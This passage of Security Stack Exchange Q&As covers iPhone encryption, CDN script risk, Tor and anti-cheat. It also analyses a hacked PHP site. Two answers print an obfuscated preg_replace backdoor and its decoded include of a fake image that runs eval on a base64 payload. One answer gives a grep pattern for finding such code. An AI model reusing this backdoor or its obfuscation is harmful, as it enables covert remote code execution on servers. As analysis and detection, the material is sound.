Update 3 : It appears that the passcode to unlock the phone was in fact simply a 4 digit code . I find this interesting because this means the FBI asked Apple to do more than was necessary. They could have simply asked Apple to disable the wipe feature and timing delay after an incorrect attempt. With only those 2 changes one could manually attempt all 10,000 possible 4 digit codes in under 14 hours (at 5 seconds per attempt). The fact that the FBI also demanded that Apple allow them to brute force electronically seems odd to me, when they knew they didn't need it. Update 4 : It turns out the FBI was able to unlock the phone without Apple's help, and because of this they dropped their case against Apple. IMO, overall this is bad news for Apple because it means that their security (at least on that type of phone) was not as strong as previously thought. Now the FBI has offered to help local law enforcement unlock other iPhones too.
Various commentators suggest that this would be possible, on the specific hardware involved in this case. For example, Dan Guido from Trail of Bits mentions that with the correct firmware signatures, it would be possible to overwrite the firmware, even without the passcode. From there, it would be possible to attempt brute force attacks against the passcode to decrypt the data. It appears to not be possible if the firmware replacement is incorrectly signed, and the signing keys have been kept secure by Apple so far. He also mentions that this wouldn't be possible on some later devices, where the passcode check is implemented in a separate hardware module, which enforces time delays between attempts. Edit Feb 2017 : Cellebrite (a data forensics company) have announced the capability to unlock and extract data from most iPhones from the 4S to the 6+ , strongly suggesting that a flaw exists somewhere, which they are able to exploit. They haven't released full details of this.
{ "source": [ "https://security.stackexchange.com/questions/114897", "https://security.stackexchange.com", "https://security.stackexchange.com/users/47578/" ] }
114,919
I just noticed that the top line of my index.php file got changed to what's below. <?php preg_replace("\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40","\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77","\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41"); ?> This looks very suspicious to me, and I know generally what preg_replace does. However, I don't know how to decode the subject, pattern, or replacement strings. Can anyone tell me What this code actually will do? How it's possible that a supposedly locked PHP file can get updated on the server?
What will this code actually do? You have a backdoor that allows Remote Code Execution Credit to borjab for the initial decode <?php preg_replace("#(.+)#ie", '@include_once(base64_decode("\1"));', "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"); ?> Note this base64 encoded string we found in the first file: L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc When decoding that string, it points to this file: /home4/mitzvahc/public_html/assets/img/logo_small.png The "image" file is not what it seems to be. kayge pointed out that the file is obviously accessible online. So I downloaded your "image", which is where the real hack is happening. The first script is trying to load the contents of that image. Inside the pretend image, there are two eval() statements which allow full arbitrary code execution when checking $GLOBALS[ooooOOOOo(0)] . This only happens if the attacker attempts to set that variable. 99% of the time when you see eval() , all you really need to know is that your entire web server is compromised by remote code execution. Here's what it's doing: eval(gzuncompress(base64_decode("evil_payload"))); Of course, you were already compromised through some form of exploit , but this gives the attacker an obfuscated backdoor into your web server that they can continually access, even if you were to patch the problem allowing them to write files in the first place. What are the evil gunzip contents? You can see them here . Inside the above, here's another encoding dump (Thanks, Technik Empire ) Technik Empire just greatly contributed to the deobfuscation of the contents in #2 . nneonneo cleaned it up even more . Why is this happening? How is it possible that a supposedly locked PHP file can get updated on the server? This is too broad to answer without having access to everything. You may have incorrect hardening on your Content Management System installation, or there may be a vulnerability somewhere in your web stack. I don't care to visit your website considering what's going on, so you can check these links if they're part of your CMS: Joomla Security Checklist WordPress Hardening Django Deployment Checklist If your CMS isn't listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it's on you to fix your security holes. There could be any number of reasons why this is happening... but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website... meanwhile, they are attacking your visitors .
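A quick, imperfect way to hunt for more files like this (a sketch only; expect false positives, and adjust the path to your webroot):
grep -rn --include='*.php' -E 'eval\(|base64_decode\(|gzuncompress\(' /path/to/webroot
Also look for preg_replace() calls using the deprecated /e modifier. Anything flagged that you did not write yourself deserves a close look, since those are exactly the functions this backdoor chains together.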
{ "source": [ "https://security.stackexchange.com/questions/114919", "https://security.stackexchange.com", "https://security.stackexchange.com/users/101591/" ] }
114,933
I currently have a Windows 2012 Server which is acting as a webserver running IIS. I am using FileZilla to host an FTP server to allow some clients FTP access to their own websites. I have set up the FTP account with ease and they are able to access their website folder. However, I really wish to explore this further and actually make it secure. At the moment there is nothing stopping them from uploading an .exe file and running it on the website to hack my server. How can I limit the files they upload to just a few desired extensions such as PHP and JS, as well as disable renaming of files (to stop them changing an extension back to .exe, for example)? Additionally, are there any other security measures I could take? Please tell me if I missed any information. Please do not reply with comments such as "If you don't trust them, don't give access" as this is off topic.
{ "source": [ "https://security.stackexchange.com/questions/114933", "https://security.stackexchange.com", "https://security.stackexchange.com/users/101600/" ] }
115,021
My website pages reference some JavaScript code from a third-party CDN (analytics, etc). So I don't control what code is there - the third party may change those scripts at any moment and introduce something bad into those scripts - maybe accidentally, maybe deliberately. Once those scripts are changed, the users start receiving and running new code in their browsers. What risks are raised by this uncontrolled code? What's the worst thing that can happen? How do I get started with managing the risk?
Risk In the worst scenario, it could render the website completely inaccessible for users, perform particular actions as them (for example, requesting account removal, spending money), or steal confidential data. Prevention Can't be done. If you run someone else's JavaScript on your website, it becomes no more secure than that third party. You have to host it yourself. You can get closer to the target, however. One thing that helps is Content Security Policy . Setting the Content-Security-Policy header to script-src 'self' www.google-analytics.com; would prevent execution of scripts served from domains other than your own or www.google-analytics.com . That way, if someone found a cross-site scripting vulnerability (XSS) that allowed them to add their own inline JavaScript code to your website - it would not run. Another really cool thing is so-called Subresource Integrity . It essentially means adding a hash of the JS you expect to run to the integrity parameter you give to the script tag. <script src="https://example.com/example-framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" crossorigin="anonymous"/> You can generate those hashes online at https://www.srihash.org/ or with the command: openssl dgst -sha384 -binary FILENAME.js | openssl base64 -A This of course has downsides, e.g. analytics providers may change their scripts and you will have to change the integrity parameter to keep them running. It's also a pretty new feature (Chrome 45.0+, Firefox 43+, Opera 32+, no IE, Edge or Safari support at the moment), so you are laying your clients' security on their own software. See also 3rd Party Javascript Management Cheat Sheet from OWASP.
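For completeness, a sketch of how that CSP header might be set at the web server (the directives below are illustrative; Apache needs mod_headers enabled):
Header set Content-Security-Policy "script-src 'self' www.google-analytics.com"      # Apache
add_header Content-Security-Policy "script-src 'self' www.google-analytics.com";     # nginx
Starting with the Content-Security-Policy-Report-Only header instead lets you watch for violations before enforcing the policy.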
{ "source": [ "https://security.stackexchange.com/questions/115021", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2052/" ] }
115,044
As far as I understand, the 4 digit passcode is combined (in some fashion) with a key stored in secure read only memory (e.g. secure enclave chip or similar), where it is directly embedded into silicon wiring to help prevent unauthorized reads. But no matter how strong or multi-layered or complicated the security is, wouldn't it still be possible to read the key directly from the silicon wiring of the secure chip or ROM, using some electron microscopy technique or similar? If so, surely the FBI could develop the technology for this, without asking Apple for help.
Yes, it is possible. However, that runs the risk of destroying the device without getting the data off first, which is undesirable. It also does not achieve the political goals of forcing Apple to assist in decrypting the device, paving the way with precedent for the flurry of future requests of this sort to come, some of which are certain to have less favorable facts and thus are not as suitable as test cases.
{ "source": [ "https://security.stackexchange.com/questions/115044", "https://security.stackexchange.com", "https://security.stackexchange.com/users/101741/" ] }
115,048
This page on server hardening has a large section on adding a SWAP partition. Why is adding a SWAP partition good for server hardening?
{ "source": [ "https://security.stackexchange.com/questions/115048", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11902/" ] }
115,269
Summary of the current situation by @TTT Apple released an open letter to the public outlining their reasons for not complying with the FBI's demands to modify the iPhone's security mechanism. Here's a summary: The FBI has an iPhone in their possession which they would like to access data from. The phone is locked and fully encrypted. After failing to get into the phone, the FBI asked Apple to unlock the phone. Apple said since the phone is encrypted, they can't get into it either. The FBI asked Apple to modify the iPhone OS to enable brute force password attempts electronically. (Currently the passwords can only be entered in via the manual interface, and is limited to 10 attempts.) Apple refused. They believe it would be too dangerous to make that change because in the wrong hands it would undermine the security of all iPhone users, even if they only used the software in this instance. My question is, if the cracking takes seven minutes, why not just release the update, wait ten or so minutes (coordinate with the FBI on this) and then release another update rolling back the change.
The whole story is weird. Since the iPhone in question does not have a tamper-resistant device, the FBI should be able to open the case, read the whole Flash chip, and then run the exhaustive search themselves without even running the phone's firmware. Updates from Apple should have no effect at all. (Edit: in fact it is a bit more complex; see below.) Conversely, assuming that there was a technical impossibility in the description above (which would amount to claiming that the FBI's level of incompetence is at least as large as their budget), and that an Apple firmware would solve the case, then it would be easy for Apple to make a firmware version that does the exhaustive search as the FBI wants, but only after having checked that the hardware serial number exactly matches some expected value, i.e. the exact phone from the San Bernardino case. Such a firmware would comply with the exact demand from the FBI without compromising the privacy of anybody else.

That the FBI claims to have tried decrypting the phone for one month and failed is weird. That Apple refuses to help with the decryption with a firmware update limited to a single phone is equally weird. What the whole thing seems to be is a political struggle about the right to privacy and the legality of non-judicial eavesdropping by law enforcement. The San Bernardino case is merely a pretext that is used to elicit reflex support from a non-technical electorate. Apple found it expedient to play the role of the White Knight, from which they cannot now back away without alienating their consumer base.

Edit: the security system in an iPhone is a tower of elements, described (succinctly) in this document. An iPhone 5C runs on an Apple A6 chip, while the 5S and later models use an A7. The A6 has an onboard tamper-resistant device called the "UID"; the A7 has a second one called the "Secure Enclave". Since the iPhone in the San Bernardino case is a 5C, I won't talk any more of the Secure Enclave.

The UID contains an internal key that is unique to the device (let's call it K_u), and is unknown to anybody else, including Apple (whether the UID generates it itself, or it is generated externally and then injected into the UID on the processing chain, is unknown; I'll assume here that if reality matches the latter case, then Apple really did not keep the key). The UID never lets that key out, but it can do an AES-based computation that uses that key.

The iPhone data is encrypted with AES, using a 256-bit key (K_d) that is derived from the combination of the user PIN and the UID key. Though Apple does not exactly detail that combination, it says it involves key wrapping, which is another name for encrypting a key with another key. We also know that a user can change his PIN, and it would be impractical to change the actual data encryption key K_d in that case, because it would involve reading, decrypting, re-encrypting and rewriting the gigabytes of user data. Thus, a plausible mechanism is the following:

- The key K_d has been generated once.
- When the phone is off, what is stored (in Flash, outside the UID) is an encryption of K_d by another key K_z.
- K_z is itself the encryption (wrapping) of the user PIN by K_u.
- Thus, unlocking entails obtaining the user PIN and submitting it to the UID, which returns K_z by encrypting the PIN with K_u. With K_z, the phone's firmware then recovers and decrypts K_d, and configures the crypto engine to use that key for all accesses to the user data.
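To make that plausible mechanism a bit more concrete, here is a small model in Python. It is only an illustrative sketch of the wrapping chain just described, not Apple's actual construction: the UID is modeled as a black box holding K_u, AES-ECB stands in for whatever key-wrapping mode is really used, and the zero-padding of the PIN is an assumption made for the example. It requires the "cryptography" package.

# Illustrative model of the PIN -> K_z -> K_d unwrapping chain described above.
# AES-ECB and the zero-padding of the PIN are assumptions for the sketch,
# not Apple's real construction.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def aes_ecb(key: bytes, data: bytes, decrypt: bool = False) -> bytes:
    op = Cipher(algorithms.AES(key), modes.ECB())
    ctx = op.decryptor() if decrypt else op.encryptor()
    return ctx.update(data) + ctx.finalize()

class ModelUID:
    """Black box holding the device-unique key K_u; it never reveals K_u."""
    def __init__(self):
        self._k_u = os.urandom(32)

    def wrap_pin(self, pin: str) -> bytes:
        # K_z = AES_{K_u}(pad(PIN)); 32 bytes so it can be used as an AES-256 key.
        return aes_ecb(self._k_u, pin.encode().ljust(32, b"\x00"))

uid = ModelUID()
k_d = os.urandom(32)                                # data key, generated once

# "Phone off" state: Flash only stores K_d wrapped under K_z.
stored_blob = aes_ecb(uid.wrap_pin("1234"), k_d)

# Unlock attempt: the firmware submits a candidate PIN to the UID and unwraps.
def try_unlock(pin: str) -> bool:
    recovered = aes_ecb(uid.wrap_pin(pin), stored_blob, decrypt=True)
    return recovered == k_d

print(try_unlock("0000"))   # False: a wrong PIN yields garbage, not K_d
print(try_unlock("1234"))   # True: the correct PIN recovers the data key

Note that in this model nothing inside the UID knows whether the PIN was right; the firmware only finds out by checking whether the unwrapped key actually works, which is exactly the point made next.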
While the actual scheme may differ in its details, the general outline must match that description. The salient points are that, although the tamper-resistant device (the UID) must be involved with each PIN try, it does not actually verify the PIN. The UID has no idea whether the PIN was correct or not. The wrong PIN counter, the delay on error, and the automatic deletion are handled externally, by the firmware. This must be so because otherwise there would be no sense in Apple allowing the break to be performed with a firmware update. Of course, one can imagine a kind of extended UID that would enforce the PIN verification and lock-out strategy, and could do so by running its own firmware that would be updatable by Apple. Such a device would really make Apple's help crucial. However, such a device would then be called a "Secure Enclave" because that's exactly what it is, and if it was added in the A7 CPU, it is precisely because it was lacking in the A6 and that absence was a vulnerability.

So what does it mean for a brute-force attack? This implies that the UID must be invoked for each user PIN try. However, that's the UID -- not the phone's firmware. If you open the iPhone case, and then the A6 CPU sub-packaging, the device UID can be accessed by connecting to it directly. It will involve some precision laser-based drilling and an electron microscope to see what you are doing, so it certainly is not easy -- let's say it will cost a few thousand dollars, because that's the same kind of thing that is done (routinely!) by people who clone and resell satellite-TV access smart cards. Once connected, an external system can submit all possible user PINs for the UID to encrypt them all and provide the corresponding K_z keys (in my terminology above). Then the rest is done offline with a PC and a copy of the Flash storage. At no point is the phone's firmware invoked.

What the FBI currently asks for is an automation of the process. They don't want to do precision drilling with lasers. They want to be able to plug something into the iPhone port without having to even open the case, so that the brute-forcing is done by the iPhone's CPU itself and the whole process can be done smoothly. Thus, it is really not about the San Bernardino case. The FBI does not want a one-shot intervention from Apple; what they ask for is a tool that will be usable repeatedly on many phones. Apple is right in claiming that what the FBI asks for exceeds the specific case that serves as emotional pretext. On the other hand, Apple could produce a firmware update that does what the FBI asks for, but only on the specific iPhone (identified through, for instance, the CPU serial number). And that firmware update would be specific to the 5C, and would not work on later models. There is no inevitability in Apple's producing a new firmware leading to a generic cracking tool for all phones of all models. But even if Apple complies with a firmware that is specific to a single iPhone, the legal precedent will have been established, and Apple would find it hard to refuse other requests, from the FBI or from other countries where Apple has business interests (i.e. all of them).

A system which would ensure protection against user PIN cracking would need a tamper-resistant device that not only enforces the PIN failure counter and key erasure, but that device should also run a firmware that is not upgradable.
The Secure Enclave has its own firmware, but it can be upgraded (firmware upgrades are signed by Apple, and the Secure Enclave hardware verifies the signature). Even on an iPhone 6, Apple retains the ability to unlock arbitrary phones.
{ "source": [ "https://security.stackexchange.com/questions/115269", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83035/" ] }
115,286
I'm running Windows in a virtual machine on my mac (via Parallels). Should I bother installing antivirus, firewall and using other conventional wisdom practices (like don't open unknown .exe etc)? I don't care about data in the virtual machine since I'm using Windows just to run some software which I can't in OSX. So if something goes wrong I can just re-install windows from scratch. Conversely I care about the data I have on my mac and even though I do regular backups it will be really bad if I happen to lose them.
Your virtual Windows machine is on the same network as your OSX host, so the same threats that come with having an infected device on a network apply to this VM. Your VM is equivalent to a PC on your network; it's not much different. The same security practices that apply to your PC also apply to your VMs. Although OSX does not run the same malicious apps that run on Windows machines, that VM can still be a threat to the rest of the devices on the network. If it becomes infected, it can also consume your machine's resources and make your host machine slow too. At times you may log in to your email/cloud account on the VM to download something, and if the VM is infected with a keylogger, your data can be stolen. You may connect a USB flash drive to the VM to transfer files elsewhere, and infection can spread this way.

Try to keep the guest operating system, along with the software used in it, updated at a minimum. If you use it moderately, get a free antivirus like Microsoft's Windows Defender.

One other threat is ransomware. Parallels Desktop has a feature that shares some of your OSX folders with Windows. If your Windows VM gets infected with ransomware, it can possibly encrypt your shared files, causing damage to your important data.

Looking at VirtualBox's manual, chapter 13, Security guide: other than the points mentioned above, plus the clipboard which SilverlightFox mentioned, it says:

13.3.4. Potentially insecure operations Enabling 3D graphics via the Guest Additions exposes the host to additional security risks; see Section 4.5.1, “Hardware 3D acceleration (OpenGL and Direct3D 8/9)”. ... When Page Fusion (see Section 4.9.2, “Page Fusion”) is enabled, it is possible that a side-channel opens up that allows a malicious guest to determine the address space layout (i.e. where DLLs are typically loaded) of one other VM running on the same host. This information leak in itself is harmless, however the malicious guest may use it to optimize attack against that VM via unrelated attack vectors. It is recommended to only enable Page Fusion if you do not think this is a concern in your setup. ...

While you're using a different hypervisor, it is imaginable that the same types of risks also apply to it.
{ "source": [ "https://security.stackexchange.com/questions/115286", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70846/" ] }
115,331
In video games, most anticheat software is run clientside (e.g. PunkBuster or Valve Anti-Cheat)- but isn't one of the first rules of security to never trust the client? If so, then why do these companies not offer server side verification for video games, but rather continue to insist on trusting the client?
If so, then why do these companies not offer server side verification for video games, but rather continue to insist on trusting the client?

It's less about insisting on trusting the client and more that there is no other viable anti-cheat model. Like DRM (and in fact, anti-cheat software like PB uses a form of DRM), there's little that can be done. DRM software has mitigations in place to keep the client from poking too much, but it has to be put on the client to try to prevent the client from doing things that the media companies don't want the client doing. Anti-cheat technology relies on a similar methodology. Information about the client is gathered, sent to the server, and if a client is seen as misbehaving, through whatever series of checks are done for the specific software, it can be banned at the server.

At the end of the day, it comes down to risk management. Yes, "don't trust the client" is one of the first tenets of security. But for mitigating risks that occur at the client, there's a cost-benefit analysis, which is what risk management is. Is the cost of letting clients continue to bot and cheat worth losing customers who want a fair and fun game? Or should some mitigations be put in place? PB and other software packages aren't there to entirely stop cheating, but aim to make it more expensive to cheat.

There is also another, more subtle way of limiting clients' ability to cheat (wall hacks, ...), mostly implemented by online-only games but not limited to them. It is achieved by not feeding the client all the data. For example, Unreal Engine 3 checks whether an actor is within your range of visibility; if this check is positive, the server sends YOU your opponent's exact location, and sends your opponent YOURS. In other words, only the server knows all positions, actions and movements of all actors in the game instance. This can be read in the documentation of the Unreal Engine 3 Client-Server Model, in the paragraph on cheating, to be found here: https://udn.epicgames.com/Three/ClientServerModel.html

So with advanced engines/network code and client-server models, it is not strictly necessary to trust the client 100%. The server can decide beforehand what the client should know, effectively LIMITING the possibilities of hacks. To go even further, the server can decide what it SHOULD know itself, so as not to get distracted or confused by clients sending forged packets.
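As a rough illustration of that last idea (the server only replicating what each client is allowed to see), here is a small sketch. It is not engine code from UE3 or any real game; the distance-based visibility check and the data layout are assumptions made purely for the example:

# Sketch of server-side visibility filtering: each client only receives the
# positions of actors it is allowed to "see". The distance threshold is arbitrary.
import math

VIEW_RANGE = 50.0

actors = {
    "player_a": (0.0, 0.0),
    "player_b": (30.0, 10.0),    # within player_a's view range
    "player_c": (400.0, 250.0),  # far away: never sent to player_a
}

def visible_to(viewer: str) -> dict:
    vx, vy = actors[viewer]
    result = {}
    for name, (x, y) in actors.items():
        if name == viewer:
            continue
        if math.hypot(x - vx, y - vy) <= VIEW_RANGE:
            result[name] = (x, y)
    return result

# The update sent to player_a omits player_c entirely, so even a fully
# compromised client cannot build a wallhack from data it never received.
print(visible_to("player_a"))   # {'player_b': (30.0, 10.0)}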
{ "source": [ "https://security.stackexchange.com/questions/115331", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102088/" ] }
115,361
Tor is known to encrypt the transferred content and the meta information by layering the encryption. I know there have been correlation attacks that deanonymized some users by federal agencies. Why do they not take over the system? There are ~7000 Relays, which seems quite few. If they provide 14,000 further relays they would be able to decrypt a great deal of information and reveal the identities of users and hidden services. So why don't they?
They might do it already; there is a known technique of dedicating malicious and powerful nodes to the network in order to take control of some of the traffic. Tor does not advertise itself as being able to protect against adversaries that have control over a fair part of the internet. While there are techniques to check the validity of the nodes, if you have control over the internet (a fair part of the network) you can de-anonymize nodes.

From the FAQ page on Tor's website, What attacks remain against onion routing?:

it is possible for an observer who can view both you and either the destination website or your Tor exit node to correlate timings of your traffic as it enters the Tor network and also as it exits. Tor does not defend against such a threat model. In a more limited sense, note that if a censor or law enforcement agency has the ability to obtain specific observation of parts of the network, it is possible for them to verify a suspicion that you talk regularly to your friend by observing traffic at both ends and correlating the timing of only that traffic. Again, this is only useful to verify that parties already suspected of communicating with one another are doing so. In most countries, the suspicion required to obtain a warrant already carries more weight than timing correlation would provide. Furthermore, since Tor reuses circuits for multiple TCP connections, it is possible to associate non anonymous and anonymous traffic at a given exit node, so be careful about what applications you run concurrently over Tor. Perhaps even run separate Tor clients for these applications.

About a Tor network takedown: they may not have enough incentive to block the whole system. After all, it's a highly decentralized, international network of nodes. If you shut down a node, another one will pop up, so it's not trivial to take the whole thing down. There are also obfuscation techniques Tor uses to hide itself from ISPs and censorship systems. They can't flip a switch and then Tor is down.

About adding malicious nodes to decrypt the traffic: it's not trivial either. You don't need just any relay node, you need an exit node to get access to unencrypted traffic (another layer of encryption may still be present, e.g. HTTPS). Tor also monitors exit nodes for malicious activity and actively blocks them.

I'm not saying your proposed scenario is not possible, I'm just saying it's not trivial.
{ "source": [ "https://security.stackexchange.com/questions/115361", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102112/" ] }
115,461
We've been getting a lot of noise regarding hacked PHP files here, and it's taking a lot of time to answer these questions. In many cases, they are off-topic. We've had a discussion about this on Information Security Meta, and many people want these posts to stay. However, nearly every single post about obfuscated PHP can be answered in almost the same way. I think we can condense the majority of the methods for de-obfuscating hacked files into one single question & answer thread. This leads to the question many people are asking: how do I de-obfuscate malicious PHP code that I found on my server, how did it happen, and what do I do?!
Fortunately, almost all PHP scripts can be deobfuscated with 4 simple methods. We're going to use these four methods to create a canonical answer. Before we begin, let's collect a list of common tools that assist in deobfuscating these malicious files so we can do the work ourselves.

Common tools that aid in deobfuscation

1. UnPHP. This greatly aids in de-obfuscating scripts that have nested obfuscation in excess of 100 nested functions. In many cases, this website, and those like it, should be the first one for you to visit. However, in some cases, UnPHP cannot deobfuscate the initial payload. In those cases, the other tools we'll list will suffice.
2. PHP Beautifier. This is an excellent tool for splitting up single-line files which are otherwise very difficult to read.
3. Base64 decoders. I'm linking to a Google search for this one. Some of these Base64 websites look kind of shady, so if you prefer to use an offline version without visiting those websites, I whipped up a quick tool for Windows (get Base64Decode.exe). Source code is available as well.
4. PHP Sandbox. You can also look for other sandboxes on Google. We'll use this to run echo commands when needed.

Commonly exploited PHP functions

The vast majority of hacks are using some form of eval, or preg_replace, or both:

- eval(). This can be an evil function, as it allows arbitrary execution of PHP code. Just finding this function in use on your website could be an indication that you've been hacked.
- preg_replace(). Frequently used with eval() to allow for arbitrary code execution. There are plenty of good uses for preg_replace(), but if you don't know how it got there, and especially if it appears alongside obfuscated code, that's a clear indication that you've been hacked.
- Additional Information. To prevent this answer from becoming too large, I'm going to link to this question about commonly-exploited PHP functions. Also, check out the OWASP PHP Cheat Sheet. While base64_decode is used in nearly all of the hacks we've come across, it mainly serves as a layer of obfuscation.

Common obfuscation formats

There are several different ways that hackers obfuscate their code. Let's list some of the common techniques so we know how to spot them and then decode them:

1. Hex encoding. You'll be looking for the HEX number on that table list. In PHP, these can be represented by backslash x, followed by a number or letter. Examples:
   \x48 = H
   \x34 = 4
   \x78 = x
   However, they aren't necessarily represented only by \x. They could be \# as well.
2. Unicode strings. Almost the same as above, but \u# instead of \x#. Examples:
   \u004D = M
   \u0065 = e
   \u0020 = (space)
   \u0070 = p
   \u006c = l
   \u0073 = s
3. Base64 encoding. Base64 is a bit different than the aforementioned methods of obfuscation, but is still relatively easy to decode. Example strings:
   SSBsaWtlIGRvbnV0cw== = I like donuts
   ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));
   QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control
4. Garbage stored in a string, split by for loops, regex, etc. You'll have to decode that yourself, as they vary considerably. Fortunately, many of the aforementioned methods should assist you in de-obfuscating this time.

How can I deobfuscate PHP files by myself?

Because we cannot help (we can, I can, but they won't let me! :P) with every single PHP malware snippet out there, it would be better to teach you how to do it. Learning how to do this yourself will help you learn more about PHP, and more about what's going on.
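If you'd rather decode these formats offline, a small script can handle the hex/Unicode escapes and Base64 strings listed above. This is just a convenience sketch in plain Python (no PHP required); it only decodes text, it never executes anything:

# Helper sketch for decoding the obfuscation formats listed above.
# It only decodes strings -- it never runs the malicious code.
import base64
import binascii
import re

def decode_php_escapes(s: str) -> str:
    # \x48 -> 'H', \u0065 -> 'e', and octal escapes like \144 -> 'd'
    s = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"\\u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), s)
    return s

def try_base64(s: str) -> str:
    try:
        return base64.b64decode(s).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return "<not valid base64>"

print(decode_php_escapes(r"\x48\x34\x78"))      # H4x
print(decode_php_escapes(r"\u004D\u0065"))      # Me
print(try_base64("SSBsaWtlIGRvbnV0cw=="))       # I like donuts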
Let's put our tools to use, and use two previous examples of PHP deobfuscation on this website. Deobfuscation Example #1 Refer to this question . Copy and paste the code into UnPHP : <?php preg_replace("\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40","\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77","\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41"); ?> And you'll see it doesn't deobfuscate it for us. Bummer. We're going to have to do some extra work. Note the strings, along with it's concatenations. Argh! It's so ugly and confusing! What are we going to do with these strings? This is where the PHP sandbox comes into play. <?php echo "\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40" . "<br/>"; echo "\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77" . "<br/>"; echo "\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41" . "<br/>"; ?> Now that we've echo'd the contents, we can rebuild it to get the following results: <?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?> Note the string, L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc ? That looks an awful lot like the Base64 encoding we talked about earlier! Let's try to decode it and see if we're right: /home4/mitzvahc/public_html/assets/img/logo_small.png After opening the logo_small.png file in some kind of text editor, we find something like this: eval(gzuncompress(base64_decode("evil_payload"))); Oh no!!! If you run the file contents through UnPHP , you should get your decoded results. Deobfuscation Example #2 Refer to this question : Remember earlier when we mentioned ASCII encoding? 
